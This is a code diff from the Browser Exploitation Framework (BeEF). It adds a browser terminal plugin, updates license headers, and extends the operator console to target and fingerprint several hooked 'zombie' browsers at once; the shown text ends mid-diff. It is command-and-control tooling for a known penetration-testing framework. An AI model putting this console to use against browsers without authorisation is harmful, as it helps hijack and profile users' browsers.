000000000..4ca740001 --- /dev/null +++ b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js @@ -0,0 +1,424 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +/** + * @Author : venkatakrishnan ganesh + * @file : wterm.jquery.js + * @url : http://wterminal.appspot.com + * @desc : + * + * Allows Emulation of Terminal on the browser. + * Completely Extendible. + * Command History. + * Commandline Editing. + * + * Modified by antisnatchor (also to prevent XSS, see line 270) + * */ + +( function( $ ) { + + + var VERSION = '0.0.4'; + + /** + * + * @function : get_defaults + * @returns : Object + * @desc : Returns Global Defaults + * + * */ + var get_defaults = function() { + + return { + + // PS1 : The Primary Prompt + PS1 : 'BeEF-bind-$', + + // TERMINAL_CLASS + // Will be applied to the primary terminal container + TERMINAL_CLASS : 'wterm_terminal', + + // PROMPT_CLASS + // Will Applied to prompt container + PROMPT_CLASS : 'wterm_prompt', + + // THEME_CLASS_PREFIX + // All Theme Classes will be prefixed by this string + THEME_CLASS_PREFIX : 'wterm_theme', + + // DEFAULT_THEME + // The theme that is applied by default + DEFAULT_THEME : '_green_on_black', + + // HIGHLIGHT_CLASS + // The Class that is applied to highlighted text + HIGHLIGHT_CLASS : 'wterm_highlight', + + // KEYWORD_CLASS + // The Class that is applied to keywords + KEYWORD_CLASS : 'wterm_keyword', + + // CONTENT_CLASS + // The Class that is applied to content section + KEYWORD_CLASS : 'wterm_content', + + // WIDTH | HIGHT + // Explicitly set width and height of the terminal + // container. This may also be done in TERMINAL_CLASS + WIDTH : '90%', + HEIGHT : '90%', + + // WELCOME_MESSAGE + // Message to be shown when the terminal is first + // published + WELCOME_MESSAGE : 'Welcome to Wterm version-' + VERSION , + + // NOT_FOUND + // Message to be published if the command is not found + // Note: "CMD" will be replaced with the actual command + NOT_FOUND : '
CMD: Command Not Found
', + + // AUTOCOMPLETE + // Is Autocomplete feature Enabled + // Please see the manual on how AUTOCOMPLETE is implemented + AUTOCOMPLETE : true, + + // HISTORY + // Is Command History Enabled + HISTORY : true, + + // HISTORY + // No of entries to be stored in HISTORY + HISTORY_ENTRIES : 100, + + + // AJAX_METHOD + // The HTTP Method that must be used for Ajax Requests + AJAX_METHOD : 'GET', + + + // AJAX_PARAMETER + // The GET/POST parameter that should be used to make requests + AJAX_PARAM : 'tokens', + + // ERROR_PREFIX + // Prefix For Error Messages + ERROR_PREFIX : 'An Error Occured: ' + + }; + }; + + + /** + * @property : dispatch + * @accessor : $.register_command ( See Below ) + * @private + * @desc : + * + * dispatch table stores command name and action + * to be taken when user enters a command. See + * Manual for more details on how to implement + * your own commands + * + **/ + var dispatch = { + }; + + + /** + * + * @method : wterm + * @public + * @desc : Sets up the terminal on the JQ object that + * represents a ( or a group ) of HTML NODE (s) + * + **/ + $.fn.wterm = function( options ) { + + + // Merge defaults with options + var settings = get_defaults(); + $.extend( true, settings, options ); + + // JQ Plugin surprised?? + return this.each( function() { + + + var element = $( this ); + var history = [ ]; + var hcurrent = null; + + // Set up some markup in the element + // required for terminal emulation + element.addClass( settings.TERMINAL_CLASS ).addClass( settings.THEME_CLASS_PREFIX + settings.DEFAULT_THEME ); + if( settings.WIDTH && settings.HEIGHT ) element.css( { width: settings.WIDTH, height: settings.HEIGHT } ) + element.html( '' ).append( '
' + settings.WELCOME_MESSAGE + '
' ); + + element.append( '
' ); + element.append( '
' + settings.PS1 + ' ' + + '
' ); + + + // Representing prompt, form, input and content section + // in the terminal + var _prompt = element.find( 'div:last span:last' ); + var input_form = element.find( 'div:last form' ); + var input = element.find( 'div:last form input' ); + var content = element.find( '.' + settings.CONTENT_CLASS ); + + // Custom Dispatcher + var cdispatch = null; + + // Temprary storage for autocomplete configuration + var ac_save = null; + + // Temporary store for current prompt + var cprompt = null; + + // Curson always needs to be on the prompt + input.focus(); + element.click( function() { input.focus(); } ); + + + /** + * @method : hide + * @private : + * @desc : Hides the prompt + **/ + var hide = function() { + _prompt.hide(); + }; + + /** + * @method : show + * @private : + * @desc : Shows the prompt + **/ + var show = function() { + _prompt.show(); + input.focus(); + }; + + /** + * @method : update_content + * @private : + * @desc : Updates the content section + * @args : current_prompt, command, data + **/ + var update_content = function( p, cmd, data ) { + content.append( '
' + p + ' ' + cmd + '
' + ( ( data ) ? data : '' ) + '
' ); + }; + + /** + * @method : clear_content + * @private : + * @desc : Updates the content section + * @args : current_prompt, command, data + **/ + var clear_content = function() { + content.html( '' ); + }; + + // Add the command to the dispatch + dispatch.clear = clear_content; + + + + /** + * @method : set_prompt + * @private : + * @desc : Set the current prompt + * @args : string + **/ + set_prompt = function( p ) { + if( p && p.length ) element.find( '.' + settings.PROMPT_CLASS).html( p + ' ' ); + }; + + + + /** + * + * @method : Anonymous + * @private : + * @event_handler + * + **/ + input_form.submit( function( e ) { + e.preventDefault(); + e.stopPropagation(); + + var value = input.attr( 'value' ); + + if( settings.HISTORY ) { + if( history.length > settings.HISTORY_ENTRIES ) history.shift(); + history.push( value ); + } + + // Reset The Input + input.attr( 'value', '' ); + var tokens = value.split( /\s+/ ); + var key = tokens[0]; + + hide(); + + var get_current_prompt = function() { + return ( cprompt ) ? cprompt : settings.PS1; + } + + var _dispatch = function( key, tokens ) { + + if( typeof key === 'function' ) { + data = key( tokens ); + /* + * antisnatchor: preventing XSS + */ + if( data ) { update_content( get_current_prompt(), $jEncoder.encoder.encodeForJavascript(value), data)} + } else if( typeof key === 'string' ) { + var to_send = { }; + to_send[ settings.AJAX_PARAM ] = tokens.join( ' ' ); + + var on_complete = function( data, text_status ) { + update_content( get_current_prompt(), value, data ) + }; + + $[ settings.AJAX_METHOD.toLowerCase() ]( key, to_send, on_complete ); + } + }; + + if( key == '' ) { + update_content( get_current_prompt() , '' ) + } else if( cdispatch && key == 'exit' ) { + + // Recover old configuration and Dispatch exit hook + settings.AUTOCOMPLETE = ( ac_save ) ? ac_save : false ; + + // Todo: test what happens when exit hook is not defined + if( cdispatch.EXIT_HOOK ) { + _dispatch( cdispatch.EXIT_HOOK, tokens ); + } else { + _dispatch( function() { return '' }, tokens ); + } + + // Clear temporary values + cdispatch = null; + cprompt = null; + + // Reset the prompt + set_prompt( settings.PS1 ); + + } else if( cdispatch ) { + + // Dispatch to the custom dispatcher + _dispatch( cdispatch.DISPATCH, tokens ); + + } else if( dispatch[ key ] ) { + if( typeof dispatch[ key ] === 'object' ) { + cdispatch = dispatch[ key ]; + cprompt = cdispatch.PS1 || key; + set_prompt( cprompt ); + + ac_save = settings.AUTOCOMPLETE; + settings.AUTOCOMPLETE = false; + + // Todo:See what happens if start hook is not defined + if( cdispatch.START_HOOK ) { + _dispatch( cdispatch.START_HOOK, tokens ); + } else { + // A stupid Hack + _dispatch( function() { return '' }, tokens ); + } + } else { + _dispatch( dispatch[ key ], tokens ); + } + } else { + update_content( settings.PS1, value, settings.NOT_FOUND.replace( 'CMD', tokens[0] )); + } + + show(); + + + } ); + + + /** + * + * @method : Anonymous + * @private : + * @event_handler + * + **/ + input.keydown( function( e ) { + var keycode = e.keyCode; + switch( keycode ) { + + case 9: + + e.preventDefault(); + + if( settings.AUTOCOMPLETE ) { + var commands = [ ]; + var current_value = input.attr( 'value' ); + // Command Completion + if( current_value.match( /^[^\s]{0,}$/ ) ) { + for( i in dispatch ) { + if( current_value == '' ) { + commands.push( i ); + } else if( i.indexOf( current_value ) == 0 ) { + commands.push( i ); + } + } + + if( commands.length > 1 ) { + update_content( settings.PS1, current_value, commands.join( '
' ) ); + } else if( commands.length == 1 ) { + input.attr( 'value', commands.pop() + ' ' ); + } + } + } + + break; + + // History Up + case 38: + e.preventDefault(); + if( settings.HISTORY ) { + hcurrent = ( hcurrent === null )? history.length - 1 : ( hcurrent == 0 ) ? history.length - 1 : hcurrent - 1; + input.attr( 'value', history[ hcurrent ] ); + } + break; + + // History Down + case 40: + e.preventDefault(); + if( settings.HISTORY ) { + if( hcurrent === null || hcurrent == (history.length - 1 ) ) break; + hcurrent++; + input.attr( 'value', history[ hcurrent ] ); + } + break; + + default: + break; + } + }); + }); + + }; + + + $.register_command = function( command, dispatch_method ) { + try { + if( typeof dispatch_method === 'function' || typeof dispatch_method === 'string' || typeof dispatch_method === 'object' ) { + dispatch[ command ] = dispatch_method; + } else { + throw 'Dispatch needs to be a method'; + } + } catch ( e ) { + // Error Handling here + } + }; + +})( jQuery ); diff --git a/extensions/autoloader/config.yaml b/extensions/autoloader/config.yaml index dc560be9f..419798363 100644 --- a/extensions/autoloader/config.yaml +++ b/extensions/autoloader/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: diff --git a/extensions/autoloader/extension.rb b/extensions/autoloader/extension.rb index 241d02885..b63fbf399 100644 --- a/extensions/autoloader/extension.rb +++ b/extensions/autoloader/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/autoloader/model.rb b/extensions/autoloader/model.rb index a6f268706..c83c441b5 100644 --- a/extensions/autoloader/model.rb +++ b/extensions/autoloader/model.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/extensions/console/config.yaml b/extensions/console/config.yaml index 6612e66d3..baa7e4865 100644 --- a/extensions/console/config.yaml +++ b/extensions/console/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: diff --git a/extensions/console/extension.rb b/extensions/console/extension.rb index 8574e46cc..cd3253a8a 100644 --- a/extensions/console/extension.rb +++ b/extensions/console/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/console/lib/command_dispatcher.rb b/extensions/console/lib/command_dispatcher.rb index ffade9889..d74602bb7 100644 --- a/extensions/console/lib/command_dispatcher.rb +++ b/extensions/console/lib/command_dispatcher.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/console/lib/command_dispatcher/command.rb b/extensions/console/lib/command_dispatcher/command.rb index 465dd3b8f..e3fb00db6 100644 --- a/extensions/console/lib/command_dispatcher/command.rb +++ b/extensions/console/lib/command_dispatcher/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension @@ -53,10 +43,10 @@ class Command print_line("Module name: " + driver.interface.cmd['Name']) print_line("Module category: " + driver.interface.cmd['Category']) print_line("Module description: " + driver.interface.cmd['Description']) - print_line("Module parameters:") + print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0 driver.interface.cmd['Data'].each{|data| - print_line(data['name'] + " => \"" + data['value'].to_s + "\" # this is the " + data['ui_label'] + " parameter") + print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label']) } if not driver.interface.cmd['Data'].nil? end @@ -168,4 +158,4 @@ class Command end -end end end end \ No newline at end of file +end end end end diff --git a/extensions/console/lib/command_dispatcher/core.rb b/extensions/console/lib/command_dispatcher/core.rb index 2a1f81a99..59ac7c82a 100644 --- a/extensions/console/lib/command_dispatcher/core.rb +++ b/extensions/console/lib/command_dispatcher/core.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension @@ -47,10 +37,14 @@ class Core end def cmd_back(*args) - if (driver.current_dispatcher.name == 'Command') - driver.remove_dispatcher('Command') - driver.interface.clearcommand #TODO: TIDY THIS UP - driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ") + if (driver.current_dispatcher.name == 'Command') + driver.remove_dispatcher('Command') + driver.interface.clearcommand #TODO: TIDY THIS UP + if driver.interface.targetid.length > 1 + driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ") + else + driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ") + end elsif (driver.current_dispatcher.name == 'Target') driver.remove_dispatcher('Target') driver.interface.cleartarget @@ -147,11 +141,12 @@ class Core [ 'Id', 'IP', + 'Browser', 'OS' ]) BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie| - tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))] + tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')] end puts "\n" @@ -178,11 +173,12 @@ class Core [ 'Id', 'IP', + 'Browser', 'OS' ]) BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie| - tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))] + tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')] end puts "\n" @@ -213,23 +209,30 @@ class Core BeEF::Core::Models::HookedBrowser.all(:lastseen.gt => (Time.new.to_i - 30)).each do |zombie| onlinezombies << zombie.id end - - if not onlinezombies.include?(args[0].to_i) - print_status("Browser does not appear to be online..") - return false - end - - if not driver.interface.settarget(args[0]).nil? + + targets = args[0].split(',') + targets.each {|t| + if not onlinezombies.include?(t.to_i) + print_status("Browser [id:"+t.to_s+"] does not appear to be online.") + return false + end + #print_status("Adding browser [id:"+t.to_s+"] to target list.") + } + + if not driver.interface.settarget(targets).nil? if (driver.dispatcher_stack.size > 1 and driver.current_dispatcher.name != 'Core') - driver.destack_dispatcher - driver.update_prompt('') + driver.update_prompt('') end - + driver.enstack_dispatcher(Target) - driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ") + if driver.interface.targetid.length > 1 + driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ") + else + driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ") + end end end @@ -287,13 +290,16 @@ class Core if not driver.interface.setofflinetarget(args[0]).nil? if (driver.dispatcher_stack.size > 1 and driver.current_dispatcher.name != 'Core') - driver.destack_dispatcher - driver.update_prompt('') + driver.update_prompt('') end driver.enstack_dispatcher(Target) - driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ") + if driver.interface.targetid.length > 1 + driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ") + else + driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ") + end end end @@ -381,4 +387,4 @@ class Core end -end end end end \ No newline at end of file +end end end end diff --git a/extensions/console/lib/command_dispatcher/target.rb b/extensions/console/lib/command_dispatcher/target.rb index a7b737360..0eaf4deeb 100644 --- a/extensions/console/lib/command_dispatcher/target.rb +++ b/extensions/console/lib/command_dispatcher/target.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension @@ -28,7 +18,7 @@ class Target begin driver.interface.getcommands.each { |folder| folder['children'].each { |command| - @@commands << folder['text'] + "/" + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_") + @@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_") } } rescue @@ -73,9 +63,9 @@ class Target driver.interface.getcommands.each { |folder| folder['children'].each { |command| - tbl << [command['id'].to_s, - folder['text'] + "/" + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"), - command['status'], + tbl << [command['id'].to_i, + folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"), + command['status'].gsub(/^Verified /,""), driver.interface.getcommandresponses(command['id']).length] #TODO } } @@ -159,7 +149,12 @@ class Target driver.enstack_dispatcher(Command) if driver.dispatched_enstacked(Command) == false - driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] / "+driver.interface.cmd['Name']+" ") + if driver.interface.targetid.length > 1 + driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] / "+driver.interface.cmd['Name']+" ") + else + driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] / "+driver.interface.cmd['Name']+" ") + end + end def cmd_select_help(*args) @@ -179,4 +174,4 @@ class Target end -end end end end \ No newline at end of file +end end end end diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb index a896184cb..98b60941c 100644 --- a/extensions/console/lib/shellinterface.rb +++ b/extensions/console/lib/shellinterface.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension @@ -60,6 +50,9 @@ class ShellInterface tree = [] BeEF::Modules.get_categories.each { |c| + if c[-1,1] != "/" + c.concat("/") + end tree.push({ 'text' => c, 'cls' => 'folder', @@ -68,7 +61,21 @@ class ShellInterface } BeEF::Modules.get_enabled.each{|k, mod| - update_command_module_tree(tree, mod['category'], get_command_module_status(k), mod['name'],mod['db']['id']) + + flatcategory = "" + if mod['category'].kind_of?(Array) + # Therefore this module has nested categories (sub-folders), munge them together into a string with '/' characters, like a folder. + mod['category'].each {|cat| + flatcategory << cat + "/" + } + else + flatcategory = mod['category'] + if flatcategory[-1,1] != "/" + flatcategory.concat("/") + end + end + + update_command_module_tree(tree, flatcategory, get_command_module_status(k), mod['name'],mod['db']['id']) } # if dynamic modules are found in the DB, then we don't have yaml config for them @@ -245,7 +252,7 @@ class ShellInterface 'os' => [BD.get(hook_session_id, 'OsName')]}) when BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING - return "Verfied Not Working" + return "Verified Not Working" when BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY return "Verified User Notify" when BeEF::Core::Constants::CommandModule::VERIFIED_WORKING @@ -336,7 +343,7 @@ class ShellInterface page_name_row = { 'category' => 'Host', - 'data' => encoded_date_stamp, + 'data' => encoded_date_stamp_hash, 'from' => 'Initialization' } @@ -358,6 +365,21 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the return values for the os name + hw_name = BD.get(self.targetsession, 'Hardware') + if not hw_name.nil? + encoded_hw_name = CGI.escapeHTML(hw_name) + encoded_hw_name_hash = { 'Hardware' => encoded_hw_name } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_hw_name_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the return values for the browser name browser_name = BD.get(self.targetsession, 'BrowserName') if not browser_name.nil? @@ -535,6 +557,21 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the yes|no value for HasPhonegap + has_phonegap = BD.get(self.targetsession, 'HasPhonegap') + if not has_phonegap.nil? + encoded_has_phonegap = CGI.escapeHTML(has_phonegap) + encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap } + + page_name_row = { + 'category' => 'Browser', + 'data' => encoded_has_phonegap_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the yes|no value for HasGoogleGears has_googlegears = BD.get(self.targetsession, 'HasGoogleGears') if not has_googlegears.nil? diff --git a/extensions/console/shell.rb b/extensions/console/shell.rb index 89cc6b20d..84d523ebb 100644 --- a/extensions/console/shell.rb +++ b/extensions/console/shell.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # require 'rex' diff --git a/extensions/customhook/api.rb b/extensions/customhook/api.rb index 90a47bdb9..d3fe850b6 100644 --- a/extensions/customhook/api.rb +++ b/extensions/customhook/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/customhook/config.yaml b/extensions/customhook/config.yaml index 9daf85e72..fe677fc14 100644 --- a/extensions/customhook/config.yaml +++ b/extensions/customhook/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: diff --git a/extensions/customhook/extension.rb b/extensions/customhook/extension.rb index 089425f23..644c3be36 100644 --- a/extensions/customhook/extension.rb +++ b/extensions/customhook/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/customhook/handler.rb b/extensions/customhook/handler.rb index 04b601094..621333741 100644 --- a/extensions/customhook/handler.rb +++ b/extensions/customhook/handler.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/customhook/html/index.html b/extensions/customhook/html/index.html index c1acd833a..0c4aee29b 100644 --- a/extensions/customhook/html/index.html +++ b/extensions/customhook/html/index.html @@ -1,3 +1,8 @@ + <%= @customhook_title %> diff --git a/extensions/demos/api.rb b/extensions/demos/api.rb index 1f3e883a8..543876bd9 100644 --- 